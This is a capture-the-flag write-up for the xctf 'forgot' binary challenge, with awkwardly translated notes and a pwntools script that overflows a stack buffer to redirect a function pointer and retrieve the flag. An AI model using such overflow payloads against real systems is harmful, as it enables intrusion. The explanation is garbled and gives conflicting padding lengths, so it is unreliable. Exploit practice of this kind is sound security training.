xctf - forgot

xctf - forgot

check it, open the NX

 

Ida pull in, you can find:

__isoc99_scanf, infinitely input,

 

 

 

 

 

 

Cycle, the reading of the character 32 and scanf determination, the presence of the last call function table according to a result on the stack, located just below the overflow variable,

And v3 + --v14 used directly as a function of stack address, if v14 is 1, the address would be a function of v3. So construction of padding plus 63 byte destination address can get filled flag

 

 

 

from pwn import *

context.log_level = 'debug'

p = remote('111.198.29.45',31543)
#p = process('./forgot')
'''
payload="A"*63+"\xcc\x86\x04\x08"
p.recvuntil("What is your name?")
p.sendline(payload)
p.interactive()

'''
payload = 'A'*0x24+p32(0x080486CC) 
#payload = "A"*32+"\xcc\x86\x04\x08"
p.recvuntil("> ")
p.sendline('a')
p.recvuntil("> ")
p.sendline(payload)

p.interactive()

exp

 

ps: 暂时不知道为什么payload = "A"*32+"\xcc\x86\x04\x08"可以得到flag，但是payload = "a"*32+"\xcc\x86\x04\x08"却不能。